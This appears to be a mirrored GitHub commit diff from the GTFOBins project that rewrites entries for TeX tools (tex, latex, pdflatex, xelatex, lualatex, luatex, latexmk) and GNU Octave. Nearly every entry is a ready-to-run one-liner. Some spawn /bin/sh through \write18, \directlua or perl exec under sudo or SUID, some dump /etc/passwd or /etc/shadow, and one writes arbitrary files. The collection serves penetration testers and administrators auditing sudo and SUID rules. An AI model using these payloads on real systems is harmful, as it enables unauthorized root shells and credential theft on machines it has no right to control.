mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Fix and improve TeX binaries and GNU Octave
This commit is contained in:
parent
806c8054eb
commit
21b641911e
@ -1,8 +1,16 @@
|
|||||||
|
---
|
||||||
|
description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||||
|
dvips -R0 texput.dvi
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document}" > file.tex
|
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||||
echo '$$\hbox to5cm{\vbox to5cm{\vfil\special{psfile="`PROGRAM > /tmp/result"}}\hfill}$$' >> file.tex
|
sudo dvips -R0 texput.dvi
|
||||||
echo "\end{document}" >> file.tex
|
limited-suid:
|
||||||
tex -interaction=nonstopmode file.tex && sudo dvips -R0 file.dvi
|
- code: |
|
||||||
cat /tmp/result
|
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||||
|
./dvips -R0 texput.dvi
|
||||||
|
---
|
||||||
|
@ -1,11 +1,21 @@
|
|||||||
description: `latex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/).
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- description: The read file will be part of the output.
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
code: |
|
||||||
latex read.tex
|
latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
strings read.dvi
|
strings article.dvi
|
||||||
sudo:
|
sudo:
|
||||||
|
- description: The read file will be part of the output.
|
||||||
|
code: |
|
||||||
|
sudo latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
|
strings article.dvi
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
sudo latex -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
|
---
|
||||||
|
@ -1,11 +1,14 @@
|
|||||||
description: `latexmk` is a perl script.
|
description: This allows to execute [`perl`](/gtfobins/perl/) code.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: latexmk -e 'exec "/bin/sh";'
|
||||||
|
- code: latexmk -latex='/bin/sh #' /dev/null
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: latexmk -e 'open(X,"/etc/passwd");while(<X>){print $_;}exit'
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
- description: The read file will be part of the output.
|
||||||
latexmk read.tex
|
code: |
|
||||||
strings read.dvi
|
TF=$(mktemp)
|
||||||
|
echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' >$TF
|
||||||
|
strings tmp.dvi
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: sudo latexmk -e 'exec "/bin/sh";'
|
||||||
echo "PROGRAM > /tmp/result.txt" > /tmp/run.sh
|
|
||||||
sudo latexmk -latex="/tmp/run.sh" file.tex
|
|
||||||
|
@ -1,6 +1,10 @@
|
|||||||
description: `lualatex` is a symbolic link to [`luatex`](/gtfobins/luatex/). However the program does not have the same behaviour regarding the name of argv[0]. It allows to call external command with \write18 but it also allows to call external [`lua`](/gtfobins/lua/) scripts.
|
---
|
||||||
|
description: This allows to execute [`lua`](/gtfobins/lua/) code.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: sudo lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||||
echo "\documentclass[12pt]{article} \usepackage{shellesc} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
limited-suid:
|
||||||
sudo lualatex -shell-escape file.tex
|
- code: ./lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||||
|
---
|
||||||
|
@ -1,7 +1,10 @@
|
|||||||
description: `luatex` allows to call external [`lua`](/gtfobins/lua/) scripts.
|
---
|
||||||
|
description: This allows to execute [`lua`](/gtfobins/lua/) code.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||||
echo '\documentclass{article} \usepackage{luacode} \begin{document} \def\foo{\directlua{dofile("runfunc.lua")}} \foo \end{document}' > file.tex
|
limited-suid:
|
||||||
echo 'os.execute("/usr/bin/id")' > runfunc.lua
|
- code: ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||||
luatex --interaction=nonstopmode --shell-escape file.tex
|
---
|
||||||
|
@ -1,10 +1,14 @@
|
|||||||
|
---
|
||||||
description: The payloads are compatible with GUI.
|
description: The payloads are compatible with GUI.
|
||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: octave-cli --eval "system('/bin/sh')"
|
- code: octave-cli --eval 'system("/bin/sh")'
|
||||||
file-write:
|
file-write:
|
||||||
- code: poctave-cli --eval 'filename = "file_to_write"; fid = fopen (filename, "w"); fputs (fid, "DATA"); fclose (fid);'
|
- code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);'
|
||||||
file-read:
|
file-read:
|
||||||
- code: octave-cli --eval 'fid = fopen ("/etc/passwd"); while(!feof(fid)); txt = fgetl(fid), txt; endwhile; fclose (fid);'
|
- code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo octave-cli --eval "system('/bin/sh')"
|
- code: sudo octave-cli --eval 'system("/bin/sh")'
|
||||||
|
limited-suid:
|
||||||
|
- code: ./octave-cli --eval 'system("/bin/sh")'
|
||||||
|
---
|
||||||
|
@ -1,11 +1,21 @@
|
|||||||
description: `pdflatex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/).
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- description: The read file will be part of the output.
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \hfuzz=25.002pt \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
code: |
|
||||||
latex read.tex
|
pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
#/etc/shadow is in read.pdf
|
pdftotext article.pdf -
|
||||||
sudo:
|
sudo:
|
||||||
|
- description: The read file will be part of the output.
|
||||||
|
code: |
|
||||||
|
sudo pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
|
pdftotext article.pdf -
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
sudo pdflatex -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
|
---
|
||||||
|
@ -1,6 +1,12 @@
|
|||||||
description: `pdftex` has a similar behaviour as [`tex`](/gtfobins/tex/)
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
sudo pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||||
pdftex -interaction=nonstopmode --shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||||
|
---
|
||||||
|
@ -1,6 +1,12 @@
|
|||||||
description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/)
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
tex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
sudo tex --shell-escape '\write18{/bin/sh}\end'
|
||||||
tex -interaction=nonstopmode --shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./tex --shell-escape '\write18{/bin/sh}\end'
|
||||||
|
---
|
||||||
|
@ -1,11 +1,21 @@
|
|||||||
description: `xelatex` is a symbolic link to [`xetex`](/gtfobins/xetex/). However the program does not have the same behaviour regarding the name of argv[0].
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- description: The read file will be part of the output.
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
code: |
|
||||||
latexmk read.tex
|
xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
#/etc/shadow is in read.pdf
|
strings article.dvi
|
||||||
sudo:
|
sudo:
|
||||||
|
- description: The read file will be part of the output.
|
||||||
|
code: |
|
||||||
|
sudo xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
|
strings article.dvi
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
sudo xelatex -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
|
---
|
||||||
|
@ -1,5 +1,12 @@
|
|||||||
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
xetex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo xetex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo xetex -interaction=nonstopmode -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./xetex --shell-escape '\write18{/bin/sh}\end'
|
||||||
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user